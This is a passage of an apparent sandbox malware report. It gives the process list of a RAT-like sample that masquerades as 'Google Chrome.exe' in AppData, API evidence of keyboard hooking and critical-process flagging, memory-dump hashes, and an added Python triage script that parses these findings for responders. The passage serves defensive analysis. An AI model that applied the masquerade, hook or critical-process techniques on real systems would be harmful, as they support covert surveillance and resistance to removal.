                                                  • Detection: 68%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:19:48:01
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0x7ff799c70000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:19:48:01
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0x880000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:19:48:09
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0xe30000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:20.2%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:7
                                                    Total number of Limit Nodes:0
                                                    Execution graph (rendering omitted, 7 nodes): 7ffd348a4588 -> 7ffd348a4591 SetWindowsHookExW -> 7ffd348a4661; 7ffd348a3c2d -> 7ffd348a3c5b RtlSetProcessIsCritical -> 7ffd348a3d12, with a second edge 7ffd348a3c2d -> 7ffd348a3bed.
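The process list and execution graph above carry the two facts a responder acts on: a binary named "Google Chrome.exe" running from a user-writable AppData path with the same MD5 as the submitted sample (a self-copy, not a Chrome install), one instance elevated, and RtlSetProcessIsCritical in the execution graph, which sets BreakOnTermination so that killing the process bug-checks the host unless the flag is cleared first. The script below is an added example for this page, not Joe Security code: it parses process entries in the report's own Key:Value layout (constructed input copied from Target ID 17, 18 and 19), pulls API names out of the execution_graph dump, and emits those findings. The lookalike-name list, the user-writable path pattern and the per-API response notes are assumptions made for the example.

```python
"""Triage of Joe Sandbox process entries and execution-graph API nodes (added
example for this report page, not Joe Security code; it only reads text copied
from the page)."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Constructed input: Target ID 17, 18 and 19 from the process list above, in the
# report's own Key:Value layout (fields not needed for triage dropped).
REPORT = r"""
Target ID:17
Start time:19:48:01
Path:C:\Users\user\AppData\Local\Google Chrome.exe
Imagebase:0x7ff799c70000
MD5 hash:12AC7EECCA99175C8953B8368D96440E
Has elevated privileges:false
Has exited:true

Target ID:18
Start time:19:48:01
Path:C:\Users\user\AppData\Local\Google Chrome.exe
Imagebase:0x880000
MD5 hash:12AC7EECCA99175C8953B8368D96440E
Has elevated privileges:true
Has exited:true

Target ID:19
Start time:19:48:09
Path:C:\Users\user\AppData\Local\Google Chrome.exe
Imagebase:0xe30000
MD5 hash:12AC7EECCA99175C8953B8368D96440E
Has elevated privileges:false
Has exited:true
"""
# Constructed input: the execution_graph dump above, copied verbatim.
EXEC_GRAPH = ("execution_graph 4534 7ffd348a4588 4535 7ffd348a4591 SetWindowsHookExW "
              "4534->4535 4537 7ffd348a4661 4535->4537 4529 7ffd348a3c2d 4530 7ffd348a3c5b "
              "RtlSetProcessIsCritical 4529->4530 4531 7ffd348a3bed 4529->4531 4533 "
              "7ffd348a3d12 4530->4533")
SUBMITTED_MD5 = "12ac7eecca99175c8953b8368d96440e"  # sample MD5 from the report header

# Assumptions for this example: names that imitate installed products, the
# user-writable roots a real install never runs from, and responder notes per API.
LOOKALIKE_NAMES = {"google chrome.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)
API_NOTES = {
    "RtlSetProcessIsCritical": "BreakOnTermination set: killing it bug-checks the host; "
                               "clear the flag or let it exit before terminating",
    "SetWindowsHookExW": "installs a Windows hook, the usual keylogging primitive in RATs",
}


@dataclass
class Proc:
    target_id: int
    path: str
    md5: str
    elevated: bool
    imagebase: int


def parse_processes(text: str) -> list[Proc]:
    """One Proc per blank-line-separated block that carries a Target ID."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        kv = {}
        for line in block.splitlines():
            key, sep, val = line.partition(":")  # first colon only, so 19:48:01 survives
            if sep:
                kv[key.strip()] = val.strip()
        if "Target ID" in kv:
            procs.append(Proc(int(kv["Target ID"]), kv.get("Path", ""),
                              kv.get("MD5 hash", "").lower(),
                              kv.get("Has elevated privileges") == "true",
                              int(kv.get("Imagebase", "0"), 16)))
    return procs


def execution_graph_apis(graph: str) -> list[str]:
    """API names in a dump: tokens that are not node ids, hex addresses or edges."""
    return [t for t in graph.split()
            if re.fullmatch(r"[A-Z][A-Za-z0-9]+", t) and not re.fullmatch(r"[0-9A-Fa-f]+", t)]


def triage(procs: list[Proc], apis: list[str], submitted_md5: str) -> list[tuple[int | None, str, str]]:
    """Correlate process entries and observed APIs into (target_id, tag, note) findings."""
    findings = []
    copies = Counter(p.md5 for p in procs)
    for p in procs:
        name = p.path.rsplit("\\", 1)[-1].lower()
        if name in LOOKALIKE_NAMES and USER_WRITABLE.match(p.path):
            findings.append((p.target_id, "masquerade", f"{name} running from user-writable {p.path}"))
        if p.md5 == submitted_md5.lower():
            findings.append((p.target_id, "self-copy",
                             f"MD5 equals the submitted sample, seen in {copies[p.md5]} targets"))
        if p.elevated:
            findings.append((p.target_id, "elevated", "this instance runs with elevated privileges"))
    findings.extend((None, "api:" + a, API_NOTES[a]) for a in apis if a in API_NOTES)
    return findings


if __name__ == "__main__":
    for tid, tag, note in triage(parse_processes(REPORT), execution_graph_apis(EXEC_GRAPH), SUBMITTED_MD5):
        print(f"[{'-' if tid is None else tid}] {tag}: {note}")
```

Run it as a script to print the findings; the same functions accept any process list or execution_graph text pasted from another report. The critical-process note is the one that changes the response: a plain taskkill of an instance that has called RtlSetProcessIsCritical crashes the machine, so clear BreakOnTermination first or wait for the process to exit on its own, as all three instances here eventually did.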

                                                    Control-flow Graph

                                                    Control-flow graph (rendering omitted): function 7ffd348a8c06-7ffd348a90c3, one call to 7ffd348a90c4.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8410c5f34781d7a0dd0c0334aa97239f06d8261159fdd649276d5d1136ded8a
                                                    • Instruction ID: 83396dda7ca4146c741b45274bd8c3930313f4c4fea89786c9ebc833e8aea4d2
                                                    • Opcode Fuzzy Hash: c8410c5f34781d7a0dd0c0334aa97239f06d8261159fdd649276d5d1136ded8a
                                                    • Instruction Fuzzy Hash: F4F1D830A0DA8D8FEBA8DF28C8557E937E1FF55310F04466EE84DC7291CB78A8458B91

                                                    Control-flow Graph

                                                    Control-flow graph (rendering omitted): function 7ffd348a99b2-7ffd348a9e3f, one call to 7ffd348a9e40.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48ed36739e0e2140f0d26847efea997d2e40c9b06346731f2fa759876d6860a6
                                                    • Instruction ID: e6b3a9ec3bd3835bd01d31cb28f7c4113d77c73ddbc7415a39a96b3b5bf017fe
                                                    • Opcode Fuzzy Hash: 48ed36739e0e2140f0d26847efea997d2e40c9b06346731f2fa759876d6860a6
                                                    • Instruction Fuzzy Hash: 14E1B230A0DA4D8FEBA8DF28C8A57E977E1FF55310F04466AD84DC7291CB78E9458B81

                                                    Control-flow Graph

                                                    Control-flow graph (rendering omitted): function 7ffd348aaca5-7ffd348ab0bf, calls to 7ffd348a2710, 7ffd348a6970, 7ffd348a6830, 7ffd348a6910, 7ffd348ab0c0 and 7ffd348ab0fa.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dffadf97718a380063aee28e0faf04dc9d858441f71f0e3f860309d92c8002c2
                                                    • Instruction ID: 754277d31b75dd108ae5857846d541b5bab6b06fb111dccfbc5c80895cfde0e2
                                                    • Opcode Fuzzy Hash: dffadf97718a380063aee28e0faf04dc9d858441f71f0e3f860309d92c8002c2
                                                    • Instruction Fuzzy Hash: AAD14A31F1DA4A4FEBD8EB6888A56F877E1FF46311F0441B9D50DD3192DE6CA8429390
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 666b12322d9624c2be63cabb06a17d912f72cf922ed1605ae84ea5b736a681fd
                                                    • Instruction ID: f75f86aa78387a01d11bfacfeda62dc63d52ed57a99d24c6ba6bf34b73b20731
                                                    • Opcode Fuzzy Hash: 666b12322d9624c2be63cabb06a17d912f72cf922ed1605ae84ea5b736a681fd
                                                    • Instruction Fuzzy Hash: 1551C31170EAC50FE79697B898692657FD2DF8B220B0901FBE48DCB2A7CD595C468312

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 59e68420339fb937f4b0862e70808b2ec835fb741240470f7487c9de78bdbe2a
                                                    • Instruction ID: b6293230dcb5a3c0752a4490196fd609aa1ea918085bc71cbb9bfc4ecf77c886
                                                    • Opcode Fuzzy Hash: 59e68420339fb937f4b0862e70808b2ec835fb741240470f7487c9de78bdbe2a
                                                    • Instruction Fuzzy Hash: 9341263190C7488FDB18DF98D895AE9BBF0FF56311F04416EE08AD3582CB786846CB91

                                                    Control-flow Graph

                                                    Control-flow graph (rendering omitted): function 7ffd348a4588-7ffd348a4698, calls SetWindowsHookExW at 7ffd348a4622-7ffd348a465f.
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 53dd740df6f9ae9e05bd5515434da7980c54f82089685ab3b91a4c97a6cf38fa
                                                    • Instruction ID: 68670aea9209c93df8005cc37003aaa5af88c8d69c65d753297949101333b794
                                                    • Opcode Fuzzy Hash: 53dd740df6f9ae9e05bd5515434da7980c54f82089685ab3b91a4c97a6cf38fa
                                                    • Instruction Fuzzy Hash: D5410A31A0CA4D4FEB58DB9C98566F9BBE1EF59321F04027ED00DD3292CE75A81287C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4N_^$5N_^
                                                    • API String ID: 0-1922742659
                                                    • Opcode ID: 9bfb62ae935eaa0fa6f23420046b893bff0b7fe21cda30ab5b9ea0427fa18275
                                                    • Instruction ID: c59513914cc51e0e85ff2837ffd826b7fb89a7ec6959184ef9587bd8d2c9782a
                                                    • Opcode Fuzzy Hash: 9bfb62ae935eaa0fa6f23420046b893bff0b7fe21cda30ab5b9ea0427fa18275
                                                    • Instruction Fuzzy Hash: FAB1E523B0D5A21BE762B7FC68750EA7BA4DF4237870C51B7C2C8DB093ED6874468295
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3390896239.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_ra66DSpa.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7109d7c0664c82ce3d707934fd0170f40d3ee528bdcd62d6f886f578503e4ab
                                                    • Instruction ID: 54ca4740b94a89fc2a263ec9e51b6bcbfe8d5ac291ebe52dfe9c6eebb015e669
                                                    • Opcode Fuzzy Hash: e7109d7c0664c82ce3d707934fd0170f40d3ee528bdcd62d6f886f578503e4ab
                                                    • Instruction Fuzzy Hash: 5AE1E031A0DA4C8FDB59EFA888957E9BBF0FF56310F0442AED04DE3192DA746845CB91
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c10e8913213f69f021383aa26df86d86db3f74876adf3ecc53668b93d66b704e
                                                    • Instruction ID: 76d76fb659f2ac69fdec210a8105f2912f5b496740ceb66fca92fa38130c82f3
                                                    • Opcode Fuzzy Hash: c10e8913213f69f021383aa26df86d86db3f74876adf3ecc53668b93d66b704e
                                                    • Instruction Fuzzy Hash: 47E11D63A0EED20FE7529B6C5CB91A97F90EF53314B0901BBD198C7293DD1D68079B82
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5352a6dc95337873d1dee39135cdc667c5a8b96e26c94c53810965871460ed86
                                                    • Instruction ID: bb0c7084a4f92d6270068b7afa105193a0a166e54b21f3d65a9a4a897913df78
                                                    • Opcode Fuzzy Hash: 5352a6dc95337873d1dee39135cdc667c5a8b96e26c94c53810965871460ed86
                                                    • Instruction Fuzzy Hash: 00D13232A0EA890FEBA5AB6858B55B57BA0EF56330B0801FED54CC71E7D91CAC05C361
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb9c690ffd06fc22e15f2bc4a8d53db476be36b1fae3ae98c3b8a7f6d8671a79
                                                    • Instruction ID: 611dfa42bfddbe2acde94aae716cd4c0c67087a2f97ea3ea317ad0014186d861
                                                    • Opcode Fuzzy Hash: fb9c690ffd06fc22e15f2bc4a8d53db476be36b1fae3ae98c3b8a7f6d8671a79
                                                    • Instruction Fuzzy Hash: A5113D76A0EBC45FDB539B2898790A47FB0EE63211B1E00EBC589CB0A3D91D5C09D793
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1f341f71704cf26990f46e58a3b51fea260c5ceab273fd905a2d737fdd0c0f6
                                                    • Instruction ID: 051b3d625153849ffefe3fb7ddaf2d479338cd6a44ca8124db659c9efd9d2a99
                                                    • Opcode Fuzzy Hash: d1f341f71704cf26990f46e58a3b51fea260c5ceab273fd905a2d737fdd0c0f6
                                                    • Instruction Fuzzy Hash: 73515632B0CA568FEBA99A9C54B15B437D2EFA2230B0900BFC25DC7297DD2DEC058755
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 864ba387f22a5d758a66af23d5c4f648163dcb7f980fc5ae030a258bd3229aca
                                                    • Instruction ID: 1835ad5ee203538a485e452621661f8bdf1d190571561c4e82317a28838e91c8
                                                    • Opcode Fuzzy Hash: 864ba387f22a5d758a66af23d5c4f648163dcb7f980fc5ae030a258bd3229aca
                                                    • Instruction Fuzzy Hash: 24413332B0DA898FEBA9DAAC54B19B477D1EF82334B4801BFD54DC7197E91DAC008394
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2192772267.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3b6fd38184237fc93bc7c73836893a3931f05703a767c9977987f8e7fe6ffd9
                                                    • Instruction ID: 3e6f96c2dd23d3de92515300de5b137c300fff38c346c3b10f100027ecd75f6b
                                                    • Opcode Fuzzy Hash: f3b6fd38184237fc93bc7c73836893a3931f05703a767c9977987f8e7fe6ffd9
                                                    • Instruction Fuzzy Hash: 1621F63190CB4C4FDB59DFAC988A7E97FF0EBA6321F04416BD448C3152DA74A41ACB92
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2193140015.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f860e395a0b69c6291c7e9ae4d5481c0bda110cfbcb3342e8658d1834b18f0f2
                                                    • Instruction ID: e076941a87815a68d82fb10a26ed7bf1aeedbe9b409a00975162994528c377e7
                                                    • Opcode Fuzzy Hash: f860e395a0b69c6291c7e9ae4d5481c0bda110cfbcb3342e8658d1834b18f0f2
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427179976.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^4$M_^7$M_^F$M_^J
                                                    • API String ID: 0-622050427
                                                    • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                    • Instruction ID: 9c0c05f8c333faab2dea8e5433de44f93eadbb4ada4e22e1690e82e5527060d5
                                                    • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                    • Instruction Fuzzy Hash: 9B21F2A7708465AED3127BFDA8249EA3754CF9433478917B2E198DB083F92870868AD0
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 473a617c49b0497dc8a210628181641c2ac10ff9d6ec80c96a92b41eb451a707
                                                    • Instruction ID: 7ecfc4fdc158dcf63016367262cd400e3c80181d2762ce28390b3469156a7bf9
                                                    • Opcode Fuzzy Hash: 473a617c49b0497dc8a210628181641c2ac10ff9d6ec80c96a92b41eb451a707
                                                    • Instruction Fuzzy Hash: 70D1FA62A0F7C64FE752976C58BA1A97FA0EF53214B0C01FBC5D8CB093DD5CA8069762
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b754d7481633081d410ffff2d8517e90a53cecaac540b6c20f496da9f6894c8
                                                    • Instruction ID: d2020000e66b57db97ab54472c149c3bc93680a6af55c58b9348f06ef5b139b8
                                                    • Opcode Fuzzy Hash: 0b754d7481633081d410ffff2d8517e90a53cecaac540b6c20f496da9f6894c8
                                                    • Instruction Fuzzy Hash: 53D14332A0EA890FEBA59B6848B55B57FE0FF56220B0841FED55DCB0E7DA1CAC05C351
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 692c3ad974a93c5817eda8b9a8c23398983ddf48fd18ba668f34bf1d5440fd68
                                                    • Instruction ID: 4c8845bbcabd88874297b07dc9c6ea89fd9ff186ae227260284b9c637697ae17
                                                    • Opcode Fuzzy Hash: 692c3ad974a93c5817eda8b9a8c23398983ddf48fd18ba668f34bf1d5440fd68
                                                    • Instruction Fuzzy Hash: C4516C33B0CA968FE7A5EA1C58B15747BD1EFA6260B1840BFC28DC7197DD29EC018351
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5850daf435abf7daed44ba77592998071977b515419a22b9223ffa8be8c86376
                                                    • Instruction ID: 789c5637d7c17024641b91a03864f524a95b7260509595d0b4340f188ccf8506
                                                    • Opcode Fuzzy Hash: 5850daf435abf7daed44ba77592998071977b515419a22b9223ffa8be8c86376
                                                    • Instruction Fuzzy Hash: D6415732B0DA898FEBA5D66C58A05B47BD1EF86324B0840BFC28DC7187E91DFC009391
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2627422451.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd3478d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 003103693d794e08a3cf8ad2d772bf663cdeddb7846a4b205ff8992cde963160
                                                    • Instruction ID: d9f8c1bf6d2926c78c0f42ce2e75b2321d5d14eafd2f9d4f3ade7a90e5b5236c
                                                    • Opcode Fuzzy Hash: 003103693d794e08a3cf8ad2d772bf663cdeddb7846a4b205ff8992cde963160
                                                    • Instruction Fuzzy Hash: 9941187041DBC48FE7978B2898969523FF0EF53321B1505DFD088CB1A3D629A84AC7A3
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2ae3a01508f30cede633856974d05c476139d547965144999846140da05ada6
                                                    • Instruction ID: 0962ff65dfd8ac79f15da0c30d11f7262c77f4c811d3b062404d6664720e084e
                                                    • Opcode Fuzzy Hash: a2ae3a01508f30cede633856974d05c476139d547965144999846140da05ada6
                                                    • Instruction Fuzzy Hash: 0031E83190C7884FDB55DB68985A7E97FF0EF96320F0481AFD148D7163D678580ACB92
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37e3942202939bb8c52b99d1d06cd84b159ed3b0565555e6cedab0393d965840
                                                    • Instruction ID: d6d6e6b152cea872a069a2bf346761a4da173928a6082c34c33376fb60535f3b
                                                    • Opcode Fuzzy Hash: 37e3942202939bb8c52b99d1d06cd84b159ed3b0565555e6cedab0393d965840
                                                    • Instruction Fuzzy Hash: 6721F623B0DA978FE7A5EA1848F05746AD1EF72250B4980BEC29DC719BCD2CEC059351
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: add2667aeea2c9f656a2cd57035088ef18349e919c1926a4df8f219f6c0f2f29
                                                    • Instruction ID: 95c53e12e2e352d2eb1484a4f1278c03b04f6a506aa0070a3affb87d34327b47
                                                    • Opcode Fuzzy Hash: add2667aeea2c9f656a2cd57035088ef18349e919c1926a4df8f219f6c0f2f29
                                                    • Instruction Fuzzy Hash: 0721F231A0CA4C8FDB58DF9CD88A7E97BE0EB95321F04812FD14DC3112DA74984ACB91
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba7feb0b3342f0a1b5a8bc7c97eb8b58327ddad3283a85b2bca895b93f17c97a
                                                    • Instruction ID: 426074deee7ed5e4ed0dc3fa029990a9f8628a5020bcbcffa8f65bdfd11ea9aa
                                                    • Opcode Fuzzy Hash: ba7feb0b3342f0a1b5a8bc7c97eb8b58327ddad3283a85b2bca895b93f17c97a
                                                    • Instruction Fuzzy Hash: 3C11E332F4E5858FE7A4E6184CF05B47ED1EF46224B4940BED68DD719BD91DBC04A360
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
